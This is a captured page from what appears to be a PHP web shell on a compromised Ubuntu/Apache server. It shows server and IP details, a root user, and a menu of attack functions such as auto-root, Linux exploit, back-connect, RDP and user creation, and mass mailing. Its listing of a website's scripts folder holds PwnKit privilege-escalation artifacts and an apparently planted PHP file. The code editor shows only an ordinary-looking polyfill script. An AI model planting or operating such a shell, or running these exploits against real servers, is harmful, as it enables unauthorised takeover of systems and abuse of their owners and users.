Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
armado
1.28
KB
-rwxrwxrwx
armado.js
1.29
KB
-rwxrwxrwx
cuadro-perfil.js
235
B
-rwxrwxrwx
footer-index.js
9.72
KB
-rwxrwxrwx
footer.js
11.93
KB
-rwxrwxrwx
header-index.js
19.98
KB
-rwxrwxrwx
header.js
20.08
KB
-rwxrwxrwx
master.js
210.79
KB
-rwxrwxrwx
master.min.js
132.36
KB
-rwxrwxrwx
polyfills.js
14.62
KB
-rwxrwxrwx
polyfills.min.js
9.84
KB
-rwxrwxrwx
popup.js
288
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
vendor.js
144.83
KB
-rwxrwxrwx
vendor.min.js
87.55
KB
-rwxrwxrwx
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : polyfills.min.js
!function(t){"function"!=typeof t.matches&&(t.matches=t.msMatchesSelector||t.mozMatchesSelector||t.webkitMatchesSelector||function(t){for(var e=this,o=(e.document||e.ownerDocument).querySelectorAll(t),n=0;o[n]&&o[n]!==e;)++n;return Boolean(o[n])}),"function"!=typeof t.closest&&(t.closest=function(t){for(var e=this;e&&1===e.nodeType;){if(e.matches(t))return e;e=e.parentNode}return null})}(window.Element.prototype),function(){"use strict";function t(t){this.time=t.time,this.target=t.target,this.rootBounds=t.rootBounds,this.boundingClientRect=t.boundingClientRect,this.intersectionRect=t.intersectionRect||h(),this.isIntersecting=!!t.intersectionRect;var e=this.boundingClientRect,o=e.width*e.height,n=this.intersectionRect,i=n.width*n.height;o?this.intersectionRatio=Number((i/o).toFixed(4)):this.intersectionRatio=this.isIntersecting?1:0}function e(t,e){var o=e||{};if("function"!=typeof t)throw new Error("callback must be a function");if(o.root&&1!=o.root.nodeType)throw new Error("root must be an Element");this._checkForIntersections=n(this._checkForIntersections.bind(this),this.THROTTLE_TIMEOUT),this._callback=t,this._observationTargets=[],this._queuedEntries=[],this._rootMarginValues=this._parseRootMargin(o.rootMargin),this.thresholds=this._initThresholds(o.threshold),this.root=o.root||null,this.rootMargin=this._rootMarginValues.map(function(t){return t.value+t.unit}).join(" ")}function o(){return window.performance&&performance.now&&performance.now()}function n(t,e){var o=null;return function(){o||(o=setTimeout(function(){t(),o=null},e))}}function i(t,e,o,n){"function"==typeof t.addEventListener?t.addEventListener(e,o,n||!1):"function"==typeof t.attachEvent&&t.attachEvent("on"+e,o)}function r(t,e,o,n){"function"==typeof t.removeEventListener?t.removeEventListener(e,o,n||!1):"function"==typeof t.detatchEvent&&t.detatchEvent("on"+e,o)}function s(t,e){var o=Math.max(t.top,e.top),n=Math.min(t.bottom,e.bottom),i=Math.max(t.left,e.left),r=Math.min(t.right,e.right),s=r-i,c=n-o;return s>=0&&c>=0&&{top:o,bottom:n,left:i,right:r,width:s,height:c}}function c(t){var e;try{e=t.getBoundingClientRect()}catch(o){}return e?(e.width&&e.height||(e={top:e.top,right:e.right,bottom:e.bottom,left:e.left,width:e.right-e.left,height:e.bottom-e.top}),e):h()}function h(){return{top:0,bottom:0,left:0,right:0,width:0,height:0}}function a(t,e){for(var o=e;o;){if(o==t)return!0;o=u(o)}return!1}function u(t){var e=t.parentNode;return e&&11==e.nodeType&&e.host?e.host:e&&e.assignedSlot?e.assignedSlot.parentNode:e}if("object"==typeof window){if("IntersectionObserver"in window&&"IntersectionObserverEntry"in window&&"intersectionRatio"in window.IntersectionObserverEntry.prototype)return void("isIntersecting"in window.IntersectionObserverEntry.prototype||Object.defineProperty(window.IntersectionObserverEntry.prototype,"isIntersecting",{get:function(){return this.intersectionRatio>0}}));var d=window.document,l=[];e.prototype.THROTTLE_TIMEOUT=100,e.prototype.POLL_INTERVAL=null,e.prototype.USE_MUTATION_OBSERVER=!0,e.prototype.observe=function(t){var e=this._observationTargets.some(function(e){return e.element==t});if(!e){if(!t||1!=t.nodeType)throw new Error("target must be an Element");this._registerInstance(),this._observationTargets.push({element:t,entry:null}),this._monitorIntersections(),this._checkForIntersections()}},e.prototype.unobserve=function(t){this._observationTargets=this._observationTargets.filter(function(e){return e.element!=t}),this._observationTargets.length||(this._unmonitorIntersections(),this._unregisterInstance())},e.prototype.disconnect=function(){this._observationTargets=[],this._unmonitorIntersections(),this._unregisterInstance()},e.prototype.takeRecords=function(){var t=this._queuedEntries.slice();return this._queuedEntries=[],t},e.prototype._initThresholds=function(t){var e=t||[0];return Array.isArray(e)||(e=[e]),e.sort().filter(function(t,e,o){if("number"!=typeof t||isNaN(t)||t<0||t>1)throw new Error("threshold must be a number between 0 and 1 inclusively");return t!==o[e-1]})},e.prototype._parseRootMargin=function(t){var e=t||"0px",o=e.split(/\s+/).map(function(t){var e=/^(-?\d*\.?\d+)(px|%)$/.exec(t);if(!e)throw new Error("rootMargin must be specified in pixels or percent");return{value:parseFloat(e[1]),unit:e[2]}});return o[1]=o[1]||o[0],o[2]=o[2]||o[0],o[3]=o[3]||o[1],o},e.prototype._monitorIntersections=function(){this._monitoringIntersections||(this._monitoringIntersections=!0,this.POLL_INTERVAL?this._monitoringInterval=setInterval(this._checkForIntersections,this.POLL_INTERVAL):(i(window,"resize",this._checkForIntersections,!0),i(d,"scroll",this._checkForIntersections,!0),this.USE_MUTATION_OBSERVER&&"MutationObserver"in window&&(this._domObserver=new MutationObserver(this._checkForIntersections),this._domObserver.observe(d,{attributes:!0,childList:!0,characterData:!0,subtree:!0}))))},e.prototype._unmonitorIntersections=function(){this._monitoringIntersections&&(this._monitoringIntersections=!1,clearInterval(this._monitoringInterval),this._monitoringInterval=null,r(window,"resize",this._checkForIntersections,!0),r(d,"scroll",this._checkForIntersections,!0),this._domObserver&&(this._domObserver.disconnect(),this._domObserver=null))},e.prototype._checkForIntersections=function(){var e=this._rootIsInDom(),n=e?this._getRootRect():h();this._observationTargets.forEach(function(i){var r=i.element,s=c(r),h=this._rootContainsTarget(r),a=i.entry,u=e&&h&&this._computeTargetAndRootIntersection(r,n),d=i.entry=new t({time:o(),target:r,boundingClientRect:s,rootBounds:n,intersectionRect:u});a?e&&h?this._hasCrossedThreshold(a,d)&&this._queuedEntries.push(d):a&&a.isIntersecting&&this._queuedEntries.push(d):this._queuedEntries.push(d)},this),this._queuedEntries.length&&this._callback(this.takeRecords(),this)},e.prototype._computeTargetAndRootIntersection=function(t,e){if("none"!=window.getComputedStyle(t).display){for(var o=c(t),n=o,i=u(t),r=!1;!r;){var h=null,a=1==i.nodeType?window.getComputedStyle(i):{};if("none"==a.display)return;if(i==this.root||i==d?(r=!0,h=e):i!=d.body&&i!=d.documentElement&&"visible"!=a.overflow&&(h=c(i)),h&&(n=s(h,n),!n))break;i=u(i)}return n}},e.prototype._getRootRect=function(){var t;if(this.root)t=c(this.root);else{var e=d.documentElement,o=d.body;t={top:0,left:0,right:e.clientWidth||o.clientWidth,width:e.clientWidth||o.clientWidth,bottom:e.clientHeight||o.clientHeight,height:e.clientHeight||o.clientHeight}}return this._expandRectByRootMargin(t)},e.prototype._expandRectByRootMargin=function(t){var e=this._rootMarginValues.map(function(e,o){return"px"==e.unit?e.value:e.value*(o%2?t.width:t.height)/100}),o={top:t.top-e[0],right:t.right+e[1],bottom:t.bottom+e[2],left:t.left-e[3]};return o.width=o.right-o.left,o.height=o.bottom-o.top,o},e.prototype._hasCrossedThreshold=function(t,e){var o=t&&t.isIntersecting?t.intersectionRatio||0:-1,n=e.isIntersecting?e.intersectionRatio||0:-1;if(o!==n)for(var i=0;i<this.thresholds.length;i++){var r=this.thresholds[i];if(r==o||r==n||r<o!=r<n)return!0}},e.prototype._rootIsInDom=function(){return!this.root||a(d,this.root)},e.prototype._rootContainsTarget=function(t){return a(this.root||d,t)},e.prototype._registerInstance=function(){l.indexOf(this)<0&&l.push(this)},e.prototype._unregisterInstance=function(){var t=l.indexOf(this);t!=-1&&l.splice(t,1)},window.IntersectionObserver=e,window.IntersectionObserverEntry=t}}();var objectFitVideos=function(t){"use strict";function e(t){for(var e=getComputedStyle(t).fontFamily,o=null,n={};null!==(o=u.exec(e));)n[o[1]]=o[2];return n["object-position"]?i(n):n}function o(t){var o=-1;t?"length"in t||(t=[t]):t=document.querySelectorAll("video");for(;t[++o];){var i=e(t[o]);(i["object-fit"]||i["object-position"])&&(i["object-fit"]=i["object-fit"]||"fill",n(t[o],i))}}function n(t,e){function o(){var o=t.videoWidth,i=t.videoHeight,s=o/i,c=r.clientWidth,h=r.clientHeight,a=c/h,u=0,d=0;n.marginLeft=n.marginTop=0,(s<a?"contain"===e["object-fit"]:"cover"===e["object-fit"])?(u=h*s,d=c/s,n.width=Math.round(u)+"px",n.height=h+"px","left"===e["object-position-x"]?n.marginLeft=0:"right"===e["object-position-x"]?n.marginLeft=Math.round(c-u)+"px":n.marginLeft=Math.round((c-u)/2)+"px"):(d=c/s,n.width=c+"px",n.height=Math.round(d)+"px","top"===e["object-position-y"]?n.marginTop=0:"bottom"===e["object-position-y"]?n.marginTop=Math.round(h-d)+"px":n.marginTop=Math.round((h-d)/2)+"px"),t.autoplay&&t.play()}if("fill"!==e["object-fit"]){var n=t.style,i=window.getComputedStyle(t),r=document.createElement("object-fit");r.appendChild(t.parentNode.replaceChild(r,t));var s={height:"100%",width:"100%",boxSizing:"content-box",display:"inline-block",overflow:"hidden"};"backgroundColor backgroundImage borderColor borderStyle borderWidth bottom fontSize lineHeight left opacity margin position right top visibility".replace(/\w+/g,function(t){s[t]=i[t]});for(var c in s)r.style[c]=s[c];n.border=n.margin=n.padding=0,n.display="block",n.opacity=1,t.addEventListener("loadedmetadata",o),window.addEventListener("optimizedResize",o),t.readyState>=1&&(t.removeEventListener("loadedmetadata",o),o())}}function i(t){return~t["object-position"].indexOf("left")?t["object-position-x"]="left":~t["object-position"].indexOf("right")?t["object-position-x"]="right":t["object-position-x"]="center",~t["object-position"].indexOf("top")?t["object-position-y"]="top":~t["object-position"].indexOf("bottom")?t["object-position-y"]="bottom":t["object-position-y"]="center",t}function r(t,e,o){o=o||window;var n=!1,i=null;try{i=new CustomEvent(e)}catch(t){i=document.createEvent("Event"),i.initEvent(e,!0,!0)}var r=function(){n||(n=!0,requestAnimationFrame(function(){o.dispatchEvent(i),n=!1}))};o.addEventListener(t,r)}var s=navigator.userAgent.indexOf("Edge/")>=0,c=new Image,h="object-fit"in c.style&&!s,a="object-position"in c.style&&!s,u=/(object-fit|object-position)\s*:\s*([-\w\s%]+)/g;h&&a||(o(t),r("resize","optimizedResize"))};"undefined"!=typeof module&&"undefined"!=typeof module.exports&&(module.exports=objectFitVideos),objectFitVideos(document.querySelectorAll(".module-banner__video"));
Close